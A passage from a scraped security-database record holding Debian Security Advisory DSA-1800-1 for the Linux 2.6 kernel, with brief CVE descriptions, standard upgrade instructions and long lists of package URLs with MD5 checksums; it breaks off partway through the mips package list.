(GNU/Linux)\r\n\r\niD8DBQFJ/JE8huANDBmkLRkRAlzXAJwJvkPuUoKwLYQPFVnF7t2DRIkzjQCgg8zC\r\nw+zXZAH5HPrUZ78bMIHk8Sw=\r\n=KhiR\r\n-----END PGP SIGNATURE-----", "cvss3": {}, "published": "2009-05-04T00:00:00", "type": "securityvulns", "title": "[SECURITY] [DSA 1787-1] New Linux 2.6.24 packages fix several vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2008-5702", "CVE-2009-1046", "CVE-2008-5395", "CVE-2008-5700", "CVE-2009-0859", "CVE-2009-0675", "CVE-2008-4307", "CVE-2009-0028", "CVE-2009-1242", "CVE-2009-0322", "CVE-2009-0676", "CVE-2009-1192", "CVE-2008-5079", "CVE-2009-0065", "CVE-2009-0745", "CVE-2009-1338", "CVE-2009-1337", "CVE-2009-0269", "CVE-2009-0834", "CVE-2009-1265", "CVE-2009-0031", "CVE-2009-1439", "CVE-2009-0029", "CVE-2008-5701"], "modified": "2009-05-04T00:00:00", "id": "SECURITYVULNS:DOC:21767", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21767", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2021-10-22T01:11:13", "description": "- ----------------------------------------------------------------------\nDebian Security Advisory DSA-1800-1 security@debian.org\nhttp://www.debian.org/security/ dann frazier\nMay 15, 2009 http://www.debian.org/security/faq\n- ----------------------------------------------------------------------\n\nPackage : linux-2.6\nVulnerability : denial of service/privilege escalation/sensitive memory leak\nProblem type : local/remote\nDebian-specific: no\nCVE Id(s) : CVE-2009-0028 CVE-2009-0834 CVE-2009-0835 CVE-2009-0859\n CVE-2009-1046 CVE-2009-1072 CVE-2009-1184 CVE-2009-1192\n CVE-2009-1242 CVE-2009-1265 CVE-2009-1337 CVE-2009-1338\n CVE-2009-1439\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service, privilege escalation or a sensitive\nmemory leak. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2009-0028\n\n Chris Evans discovered a situation in which a child process can\n send an arbitrary signal to its parent.\n\nCVE-2009-0834\n\n Roland McGrath discovered an issue on amd64 kernels that allows\n local users to circumvent system call audit configurations which\n filter based on the syscall numbers or argument details.\n\nCVE-2009-0835\n\n Roland McGrath discovered an issue on amd64 kernels with\n CONFIG_SECCOMP enabled. By making a specially crafted syscall,\n local users can bypass access restrictions.\n\nCVE-2009-0859\n\n Jiri Olsa discovered that a local user can cause a denial of\n service (system hang) using a SHM_INFO shmctl call on kernels\n compiled with CONFIG_SHMEM disabled. This issue does not affect\n prebuilt Debian kernels.\n\nCVE-2009-1046\n\n Mikulas Patocka reported an issue in the console subsystem that\n allows a local user to cause memory corruption by selecting a\n small number of 3-byte UTF-8 characters.\n\nCVE-2009-1072\n\n Igor Zhbanov reported that nfsd was not properly dropping\n CAP_MKNOD, allowing users to create device nodes on file systems\n exported with root_squash.\n\nCVE-2009-1184\n\n Dan Carpenter reported a coding issue in the selinux subsystem\n that allows local users to bypass certain networking checks when\n running with compat_net=1.\n \nCVE-2009-1192\n\n Shaohua Li reported an issue in the AGP subsystem they may allow\n local users to read sensitive kernel memory due to a leak of\n uninitialized memory.\n\nCVE-2009-1242\n\n Benjamin Gilbert reported a local denial of service vulnerability\n in the KVM VMX implementation that allows local users to trigger\n an oops.\n\nCVE-2009-1265\n\n Thomas Pollet reported an overflow in the af_rose implementation\n that allows remote attackers to retrieve uninitialized kernel\n memory that may contain sensitive data.\n\nCVE-2009-1337\n\n Oleg Nesterov discovered an issue in the exit_notify function that\n allows local users to send an arbitrary signal to a process by\n running a program that modifies the exit_signal field and then\n uses an exec system call to launch a setuid application.\n\nCVE-2009-1338\n\n Daniel Hokka Zakrisson discovered that a kill(-1) is permitted to\n reach processes outside of the current process namespace.\n \nCVE-2009-1439\n\n Pavan Naregundi reported an issue in the CIFS filesystem code that\n allows remote users to overwrite memory via a long\n nativeFileSystem field in a Tree Connect response during mount.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.6.26-15lenny2.\n\nFor the oldstable distribution (etch), these problems, where applicable,\nwill be fixed in future updates to linux-2.6 and linux-2.6.24.\n\nWe recommend that you upgrade your linux-2.6 and user-mode-linux packages.\n\nNote: Debian carefully tracks all known security issues across every\nlinux kernel package in all releases under active security support.\nHowever, given the high frequency at which low-severity security\nissues are discovered in the kernel and the resource requirements of\ndoing an update, updates for lower priority issues will normally not\nbe released for all kernels at the same time. Rather, they will be\nreleased in a staggered or "leap-frog" fashion.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nThe following matrix lists additional source packages that were rebuilt for\ncompatability with or to take advantage of this update:\n\n Debian 5.0 (lenny)\n user-mode-linux 2.6.26-1um-2+15lenny2\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-15lenny2.diff.gz\n Size/MD5 checksum: 7329571 1bce8a02959ba560840a7ddf3c85d903\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26.orig.tar.gz\n Size/MD5 checksum: 61818969 85e039c2588d5bf3cb781d1c9218bbcb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-15lenny2.dsc\n Size/MD5 checksum: 5777 5a7ff16752f5110837e60b4a5c8e9000\n http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.26-1um-2+15lenny2.dsc\n Size/MD5 checksum: 1272 46e99e7c41b6ab88585e915a38834af2\n http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.26-1um-2+15lenny2.diff.gz\n Size/MD5 checksum: 13274 692ffd3b2e648159d13941cffe052413\n http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.26-1um.orig.tar.gz\n Size/MD5 checksum: 12566 58cd8b7f3a51b2272c9afc10b81551cc\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-15lenny2_all.deb\n Size/MD5 checksum: 119468 9ad04974bda322d3bbef07498f30a9d6\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-15lenny2_all.deb\n Size/MD5 checksum: 1757514 bb327a7a975d8c99f17dfd155a2a72a2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-15lenny2_all.deb\n Size/MD5 checksum: 104110 bdd9af9837d54a8fb50129861c97dc8f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-15lenny2_all.deb\n Size/MD5 checksum: 48700438 49386b86f3c839ac6fcdb18bd8c29c04\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-15lenny2_all.deb\n Size/MD5 checksum: 2261264 29b2eb0593f8a91f2d0ec226d273b9da\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-15lenny2_all.deb\n Size/MD5 checksum: 4624712 dd7e6ff69cf56f23c60496ff73f7298b\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny2_alpha.deb\n Size/MD5 checksum: 751056 dafcb057c2a435bd9df498619e29e1a7\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-15lenny2_alpha.deb\n Size/MD5 checksum: 369566 f56eadc0219fd2a2747b83ba4ab8eacb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-15lenny2_alpha.deb\n Size/MD5 checksum: 28444362 7550723b98c8449b38be12f9878d3778\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny2_alpha.deb\n Size/MD5 checksum: 3608062 b9ef0cc9e5c6d91626182ae4dd6ba8e8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-15lenny2_alpha.deb\n Size/MD5 checksum: 369154 f93e3de04d17cbe97485014d90f3c28c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-15lenny2_alpha.deb\n Size/MD5 checksum: 369350 7f2fd6ba761701961161a47a96072689\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny2_alpha.deb\n Size/MD5 checksum: 103660 bdc8b2803a3e66f5359f256270d6f5ae\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-15lenny2_alpha.deb\n Size/MD5 checksum: 103676 ed05e6468ab11308e64166a3ee12e881\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-15lenny2_alpha.deb\n Size/MD5 checksum: 29151222 870766e5b3f04cf9c035cbeac559938a\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-15lenny2_amd64.deb\n Size/MD5 checksum: 392188 0654ee97b3c916c94e101a28e62b7758\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-15lenny2_amd64.deb\n Size/MD5 checksum: 3935410 078ccbf5fd16712f8bf5ff151de046c9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-15lenny2_amd64.deb\n Size/MD5 checksum: 20918522 69de946d1bfb38db74dd37dc11bb77a2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-15lenny2_amd64.deb\n Size/MD5 checksum: 392818 ab57bec86e9379a94a35e99751905d8b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-15lenny2_amd64.deb\n Size/MD5 checksum: 3852298 9ac3894ba6a9c59c5c246b1cb515088f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-15lenny2_amd64.deb\n Size/MD5 checksum: 388042 76cc4730e19076a63e7a984581599e82\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-15lenny2_amd64.deb\n Size/MD5 checksum: 103642 96e6f166c99d1345c2532e6128d68b63\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-15lenny2_amd64.deb\n Size/MD5 checksum: 19288550 8e326e2bf136131abca1a3a60ddab9de\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-15lenny2_amd64.deb\n Size/MD5 checksum: 397950 666585c1b6514caac9513ee0e960e549\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny2_amd64.deb\n Size/MD5 checksum: 761832 88fe1a58c498c24ec8ccbe45ae862715\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-15lenny2_amd64.deb\n Size/MD5 checksum: 103686 fe41064607e75452828b8d9b7ee43e05\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-15lenny2_amd64.deb\n Size/MD5 checksum: 3830612 ba30367c79415273f405f7badde67ef7\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-15lenny2_amd64.deb\n Size/MD5 checksum: 20896590 733b6e160bd73635703449966f4014c2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-15lenny2_amd64.deb\n Size/MD5 checksum: 21074418 7bcb629b5c1ab7edd559cfd1518606eb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny2_amd64.deb\n Size/MD5 checksum: 3794626 841fa07f11ebced3f6043398764203c2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny2_amd64.deb\n Size/MD5 checksum: 103652 9d14ba4a406d5c2f54377e9ed9385291\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-15lenny2_amd64.deb\n Size/MD5 checksum: 1799890 3fbde882e04f90712afab46ceb1d2e4f\n http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.26-1um-2+15lenny2_amd64.deb\n Size/MD5 checksum: 5823978 d57d4ddc15c0c661db45766236aafd1f\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-15lenny2_arm.deb\n Size/MD5 checksum: 357196 61cf0294a78ae1aa4980eadc186b02bf\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-15lenny2_arm.deb\n Size/MD5 checksum: 11714240 6e461c880ce62f76fc2ae450df65ac7f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny2_arm.deb\n Size/MD5 checksum: 4135562 934da0c4113cf93379303d7c426b9ec0\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-footbridge_2.6.26-15lenny2_arm.deb\n Size/MD5 checksum: 345872 51a9ca83773967b4fca791ad7304e8b9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-15lenny2_arm.deb\n Size/MD5 checksum: 11407528 01c0704554c7e5783af0bfe243583b2f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-footbridge_2.6.26-15lenny2_arm.deb\n Size/MD5 checksum: 10229940 7cdafb4746b99daf343615abd065b52c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-15lenny2_arm.deb\n Size/MD5 checksum: 360706 c0553218a6dc212e6e262f2c5d4e95e9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-15lenny2_arm.deb\n Size/MD5 checksum: 362878 063b38690d57b4bed42f47ae6669a205\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny2_arm.deb\n Size/MD5 checksum: 103570 67283a7c868e3b020ea32df43305e6cb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny2_arm.deb\n Size/MD5 checksum: 743442 f032b462f2ced0b29ef8fad467dc53e3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-arm_2.6.26-15lenny2_arm.deb\n Size/MD5 checksum: 103614 b834c333d52e174cfafa707c1cf6007f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-15lenny2_arm.deb\n Size/MD5 checksum: 12429986 3e583ab23c35a27a13cb10cc0da581f0\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-15lenny2_armel.deb\n Size/MD5 checksum: 362534 553b5d4a96face61b87a8e072f1f9ff8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny2_armel.deb\n Size/MD5 checksum: 4127498 168ff1a45080f3c4cba4a04d1b326b16\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-15lenny2_armel.deb\n Size/MD5 checksum: 11682088 d75f73e9f4614bfb13de3c73b5b2ae9a\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny2_armel.deb\n Size/MD5 checksum: 744114 76f75b81436e3b3b387e8fd405535dca\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-15lenny2_armel.deb\n Size/MD5 checksum: 334058 16bf2ddbe077aef886e30ecd08320792\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-15lenny2_armel.deb\n Size/MD5 checksum: 12394862 3dcf9c71e56fbd49c1ac8088c2271a67\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-15lenny2_armel.deb\n Size/MD5 checksum: 359142 f44a38848367e077d3ab10095695a1f9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-15lenny2_armel.deb\n Size/MD5 checksum: 103698 b2db17336a565129e4cd858cfdbebdec\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-15lenny2_armel.deb\n Size/MD5 checksum: 9570956 c1202b4698c40d8ba708227cc463ba75\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-15lenny2_armel.deb\n Size/MD5 checksum: 364206 28ac049650ad018de6f30b2f974c335e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-15lenny2_armel.deb\n Size/MD5 checksum: 11370938 f1272a12e1fe6bdb4a1e75be8d205c08\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny2_armel.deb\n Size/MD5 checksum: 103664 efcc623f3063eab822d32d3392659bb1\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-15lenny2_hppa.deb\n Size/MD5 checksum: 293774 11f697620d8e797204a9ee43c7e49e86\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-15lenny2_hppa.deb\n Size/MD5 checksum: 296078 103c08b6d81814a758e70381efbd00cb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-15lenny2_hppa.deb\n Size/MD5 checksum: 17469984 5bf0999276e32dcc44eae2f5dae41c43\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny2_hppa.deb\n Size/MD5 checksum: 3596462 498f39403026997ec7e9bd0daa01ae05\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-15lenny2_hppa.deb\n Size/MD5 checksum: 103600 b5edaa5c335be330726ef6dbab25bcd8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-15lenny2_hppa.deb\n Size/MD5 checksum: 16925522 4c7ca20db89d33a0c050165a7ca41533\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-15lenny2_hppa.deb\n Size/MD5 checksum: 293006 b8543710d9d5eba22a4a1bc6128436d9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny2_hppa.deb\n Size/MD5 checksum: 103574 35b0f4350ceb613d3790f054a720a2c7\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-15lenny2_hppa.deb\n Size/MD5 checksum: 294442 b6ffd162c317e0bd787a6f5db35af295\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-15lenny2_hppa.deb\n Size/MD5 checksum: 16202302 30d4723632168c7a4b1a2b0ebd993c6c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny2_hppa.deb\n Size/MD5 checksum: 755564 07bda4c6ddbf6a86ff2d37f5faa53a3b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-15lenny2_hppa.deb\n Size/MD5 checksum: 15613120 13474e40e538a178556712045a1055c2\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 401964 67ca4a3a5e393d5dfc3d72b22c29ac24\n http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.26-1um-2+15lenny2_i386.deb\n Size/MD5 checksum: 5352762 0492fa26aacea1e90a2a8076f421736d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 20260632 0903069efeb795506c5de03770992c4d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 382028 04fdd8c04218b0adabedf7255de595dc\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 3715228 9a34e86a009de2cfce28c65486c435b1\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 395624 e7f8a141fcce18b9175f988961560481\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 103638 2e1729b6d848f742b6330e6d5a695a44\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 20236806 82db8b2a80d62b4a09d33e83a88750ec\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 395790 b55d97b7a62538cc00f886ea8655e59a\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 396078 58d4fb3d17f32ffdc57a17a3a0e2a647\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 20142406 30711aa079af780c44aab9474c404917\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 746566 1044f2f109e75208c88397938b0a793f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 103652 404c334a0703eb5710593c6eade7c2f3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 20117418 65608dc1c7f99ab38fcd30a1a4bb06da\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 396930 e589efc8e5b6a5c0649d1b4a9508b477\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 20412848 43c86e53ac74b81cd167e59df620c6ae\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 17945358 6bf8a4efc2d3d2af2ed9873f0ed4a940\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 1589190 20210ab586114583a1227b00e7ddf23c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 384234 86d3c745e0456a25f481c9585becd71f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 3847862 8177698dda0696e378accfe9c3d3c44f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 3747978 b25b6df842f713a7736448d91be804a3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 103700 05a3a356d68d4777ed08c8e88e234c17\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 396910 3b1af51b193bbb723c20f3ff1063a9f6\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 20766900 c3d03294fd3777044a6fe908e77ca56e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 20082656 0a700ba7ed7bcf1c94cffe57722c8e77\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-15lenny2_i386.deb\n Size/MD5 checksum: 3770904 2c20fd09d1b57aceb659b650d2a86c3e\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-15lenny2_ia64.deb\n Size/MD5 checksum: 3683456 f8e33d2b49c0dc0f6daaa8c1c5aed6a1\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-15lenny2_ia64.deb\n Size/MD5 checksum: 352408 9087493ca55454b97152ebf3e12ac027\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-15lenny2_ia64.deb\n Size/MD5 checksum: 34097344 aad5d13c617ffaf5efc31bf3fee5bdbb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny2_ia64.deb\n Size/MD5 checksum: 103650 61015b0fb2d786664d340caec9556cb3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-15lenny2_ia64.deb\n Size/MD5 checksum: 351716 9a1c3c31cedebd60ea0e71a983edbe24\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-15lenny2_ia64.deb\n Size/MD5 checksum: 34176080 7d8b2afa280521af629da3ef6a8dcf96\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-15lenny2_ia64.deb\n Size/MD5 checksum: 33920860 261eab4d401617b4e50d5e9c7fa9478c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-15lenny2_ia64.deb\n Size/MD5 checksum: 103682 e8ef7422829d57e214062770ee1516fd\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-15lenny2_ia64.deb\n Size/MD5 checksum: 351762 3c392c2f3ecc09b8794b9c08a6dda4d9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-15lenny2_ia64.deb\n Size/MD5 checksum: 352368 f63441dda8bf0e1394d4e71531b5c3f6\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-15lenny2_ia64.deb\n Size/MD5 checksum: 33988600 8fc3c10d5f376828d451263e2a5a0411\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny2_ia64.deb\n Size/MD5 checksum: 3651316 fa72532376b07227d336484a5eb9b59c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny2_ia64.deb\n Size/MD5 checksum: 745208 bbb6f3e7e0aa49a23b19b0995f458d2b\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-15lenny2_mips.deb\n Size/MD5 checksum: 29180882 69a83b37e95628c4ca370f1c8ab6e101\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-15lenny2_mips.deb\n Size/MD5 checksum: 19996594 09ab2685b1d53cd77b9554fbfafed256\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-15lenny2_mips.deb\n Size/MD5 checksum: 19985912 7de8b500b44f9fc8249944de2146a251\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny2_mips.deb\n Size/MD5 checksum: 3959292 ccf258221f247d7d6524511d64336422\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-15lenny2_mips.deb\n Size/MD5 checksum: 295336 